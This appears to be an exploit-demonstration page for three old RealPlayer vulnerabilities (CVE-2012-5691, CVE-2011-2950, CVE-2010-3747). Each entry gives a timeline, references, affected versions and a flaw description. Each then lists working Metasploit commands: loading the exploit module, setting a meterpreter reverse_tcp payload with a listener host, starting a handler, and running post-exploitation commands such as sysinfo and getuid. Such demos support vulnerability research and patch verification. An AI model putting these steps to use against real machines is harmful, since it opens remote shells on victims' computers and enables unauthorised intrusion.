CVE-2012-5691 RealPlayer RealMedia File Handling Buffer Overflow Metasploit Demo

Timeline :

Vulnerability discovered and reported to vendor by auto
Coordinated public release of the vulnerability the 2012-12-14
Metasploit PoC provided the 2012-12-25

PoC provided by :

suto

Reference(s) :

CVE-2012-5691
OSVDB-88486
BID-56956
RealNetworks Security Advisory

Affected version(s) :

Real Player version 15.0.5.109 and bellow

Tested on Windows XP Pro SP3 with :

Real Player 15.0.5.109

Description :

This module exploits a stack based buffer overflow on RealPlayer prior or equal to 15.0.6.14. The vulnerability exists in the handling of real media files, due to the insecure usage of the GetPrivateProfileString function to retrieve the URL property from an InternetShortcut section. This module generates a malicious rm file which must be opened with RealPlayer via drag and drop or double click methods.

Commands :

use exploit/windows/fileformat/real_player_url_property_bof
set FILENAME msf.rm
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.26
exploit

use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.26
exploit -j

sysinfo
getuid

CVE-2011-2950 : RealNetworks RealPlayer QCP Parsing Heap Overflow Metasploit Demo

Timeline :

Vulnerability discovered by Sean de Regge and submitted to ZDI
Vulnerability reported to vendor by ZDI the 2011-04-01
Coordinated public release of the vulnerability the 2011-08-16
Metasploit PoC provided the 2011-09-16

PoC provided by :

Sean de Regge
juan vazquez

Reference(s) :

CVE-2011-2950
ZDI-11-265
OSVDB-74549

Affected version(s) :

RealPlayer 11.0 – 11.1
RealPlayer SP 1.0 – 1.1.5
RealPlayer 14.0.0 – 14.0.5

Tested on Windows XP SP3 with :

Internet Explorer 7.0.5730.13
Apple RealPlayer 14.0.2.633

Description :

This module exploits a heap overflow in Realplayer when handling a .QCP file. The specific flaw exists within qcpfformat.dll. A static 256 byte buffer is allocated on the heap and user-supplied data from the file is copied within a memory copy loop. This allows a remote attacker to execute arbitrary code running in the context of the web browser via a .QCP file with a specially crafted “fmt” chunk. At this moment this module exploits the flaw on Windows XP IE6, IE7.

Commands :

use exploit/windows/browser/realplayer_qcp
set SRVHOST 192.168.178.21
exploit
getuid
sysinfo

CVE-2010-3747 : RealNetworks RealPlayer CDDA URI Initialization Vulnerability

Timeline :

Vulnerability discovered by CHkr_D591
Vulnerability transmitted to ZDI by CHkr_D591
Vulnerability reported to the vendor by ZDI the 2009-11-24
Coordinated public release of advisory the 2010-10-15
Saint PoC provided the 2010-10-22
Metasploit PoC provided the 2011-03-17

PoC provided by :

bannedit
sinn3r

Reference(s) :

CVE-2010-3747
ZDI-10-210
OSVDB-68673
RealNetworks

Affected version(s) :

RealPlayer 11 to 11.1
RealPlayer SP 1.0 to 1.1.4

Tested on Windows XP SP3 with :

RealPlayer SP 1.1
IE 6.0.2900.5512

Description :

This module exploits a initialization flaw within RealPlayer 11/11.1 and RealPlayer SP 1.0 – 1.1.4. An abnormally long CDDA URI causes an object initialization failure. However, this failure is improperly handled and uninitialized memory executed.

Commands :

use exploit/windows/browser/realplayer_cdda_uri
set SRVHOST 192.168.178.21
set TARGET 0
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit

sysinfo
getuid